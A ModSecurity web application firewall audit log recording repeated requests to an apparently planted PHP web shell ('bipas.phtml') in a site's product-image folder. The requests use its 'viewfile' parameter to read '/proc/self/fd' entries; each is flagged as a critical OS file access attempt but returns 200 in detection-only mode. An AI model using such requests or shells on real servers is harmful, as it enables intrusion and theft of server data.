[17/Jun/2025:06:11:58.752594 +0530] aFC51gBFs81uFEfQOXaeVQAAAAM 216.73.216.240 38468 127.0.0.1 7081 --680a625f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F106 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --680a625f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --680a625f-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/106"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/106"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC51gBFs81uFEfQOXaeVQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120918748132 4518 (- - -) Stopwatch2: 1750120918748132 4518; combined=2385, p1=370, p2=1881, p3=38, p4=35, p5=61, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --680a625f-Z-- --6a29487c-A-- [17/Jun/2025:06:11:59.935453 +0530] aFC5134j6VFpohzeqUMWvQAAAAo 216.73.216.240 35580 127.0.0.1 7081 --6a29487c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F134 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6a29487c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --6a29487c-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/134"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/134"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC5134j6VFpohzeqUMWvQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120919931085 4422 (- - -) Stopwatch2: 1750120919931085 4422; combined=2370, p1=362, p2=1876, p3=37, p4=37, p5=58, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6a29487c-Z-- --2dbefd65-A-- [17/Jun/2025:06:12:00.572654 +0530] aFC52FJfblPUQiSn5r2ccAAAAAA 216.73.216.240 35666 127.0.0.1 7081 --2dbefd65-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F80 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --2dbefd65-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --2dbefd65-H-- Message: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/80"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/8" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/8 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/80"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC52FJfblPUQiSn5r2ccAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120920568120 4587 (- - -) Stopwatch2: 1750120920568120 4587; combined=2426, p1=368, p2=1920, p3=41, p4=37, p5=59, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2dbefd65-Z-- --3c238f3d-A-- [17/Jun/2025:06:12:00.664849 +0530] aFC52H4j6VFpohzeqUMWvgAAAAo 216.73.216.240 35678 127.0.0.1 7081 --3c238f3d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F14 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --3c238f3d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --3c238f3d-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/14"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/14"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC52H4j6VFpohzeqUMWvgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120920660387 4516 (- - -) Stopwatch2: 1750120920660387 4516; combined=2348, p1=331, p2=1886, p3=38, p4=37, p5=56, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c238f3d-Z-- --05155539-A-- [17/Jun/2025:06:12:01.030476 +0530] aFC52QBFs81uFEfQOXaeWQAAAAM 216.73.216.240 35742 127.0.0.1 7081 --05155539-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F122 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --05155539-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --05155539-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/122"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/122"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC52QBFs81uFEfQOXaeWQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120921026167 4363 (- - -) Stopwatch2: 1750120921026167 4363; combined=2382, p1=409, p2=1834, p3=35, p4=32, p5=72, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --05155539-Z-- --34b4fc78-A-- [17/Jun/2025:06:12:05.037629 +0530] aFC53YoVQnPDyHnl9oPegQAAAAY 216.73.216.240 36328 127.0.0.1 7081 --34b4fc78-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F29 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --34b4fc78-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --34b4fc78-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/29"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/29"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53YoVQnPDyHnl9oPegQAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120925032174 5529 (- - -) Stopwatch2: 1750120925032174 5529; combined=3052, p1=476, p2=2400, p3=53, p4=47, p5=76, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34b4fc78-Z-- --410aa83c-A-- [17/Jun/2025:06:12:05.308521 +0530] aFC53dyZ4SMykfn97vzCOwAAAAs 216.73.216.240 36352 127.0.0.1 7081 --410aa83c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F136 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --410aa83c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --410aa83c-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/136"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/136"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53dyZ4SMykfn97vzCOwAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120925303942 4635 (- - -) Stopwatch2: 1750120925303942 4635; combined=2567, p1=402, p2=2004, p3=39, p4=38, p5=84, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --410aa83c-Z-- --087e6e66-A-- [17/Jun/2025:06:12:05.854456 +0530] aFC53dyZ4SMykfn97vzCPAAAAAs 216.73.216.240 36406 127.0.0.1 7081 --087e6e66-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F140 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --087e6e66-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --087e6e66-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/140"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/140"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53dyZ4SMykfn97vzCPAAAAAs"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120925849869 4653 (- - -) Stopwatch2: 1750120925849869 4653; combined=2490, p1=357, p2=1983, p3=39, p4=40, p5=71, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --087e6e66-Z-- --72f3b76a-A-- [17/Jun/2025:06:12:06.490538 +0530] aFC53oiFNOCfBactc_VF_QAAAAE 216.73.216.240 36494 127.0.0.1 7081 --72f3b76a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F51 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --72f3b76a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --72f3b76a-H-- Message: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/51"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/5" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/5 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/51"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53oiFNOCfBactc_VF_QAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120926486537 4062 (- - -) Stopwatch2: 1750120926486537 4062; combined=2135, p1=336, p2=1678, p3=34, p4=32, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --72f3b76a-Z-- --97a5d36d-A-- [17/Jun/2025:06:12:06.853599 +0530] aFC53gBFs81uFEfQOXaeZQAAAAM 216.73.216.240 36558 127.0.0.1 7081 --97a5d36d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F128 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --97a5d36d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --97a5d36d-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/128"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/128"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53gBFs81uFEfQOXaeZQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120926850158 3493 (- - -) Stopwatch2: 1750120926850158 3493; combined=1961, p1=292, p2=1555, p3=33, p4=30, p5=51, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --97a5d36d-Z-- --5bd21628-A-- [17/Jun/2025:06:12:06.945289 +0530] aFC53lCTF37l_jAzt4odnQAAAAU 216.73.216.240 36568 127.0.0.1 7081 --5bd21628-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F110 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --5bd21628-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2990 Connection: close Content-Type: text/html; charset=UTF-8 --5bd21628-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/110"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/110"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53lCTF37l_jAzt4odnQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120926941582 3770 (- - -) Stopwatch2: 1750120926941582 3770; combined=1907, p1=336, p2=1451, p3=34, p4=31, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5bd21628-Z-- --cf094170-A-- [17/Jun/2025:06:12:07.218281 +0530] aFC53wJ4p5Cdblnjra6C3gAAAAI 216.73.216.240 36602 127.0.0.1 7081 --cf094170-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fproc%2Fself%2Ffd%2F77 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --cf094170-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2988 Connection: close Content-Type: text/html; charset=UTF-8 --cf094170-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/77"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/thread-self/root/proc/self/fd/77"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFC53wJ4p5Cdblnjra6C3gAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1750120927214277 4057 (- - -) Stopwatch2: 1750120927214277 4057; combined=2067, p1=349, p2=1592, p3=37, p4=33, p5=56, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf094170-Z--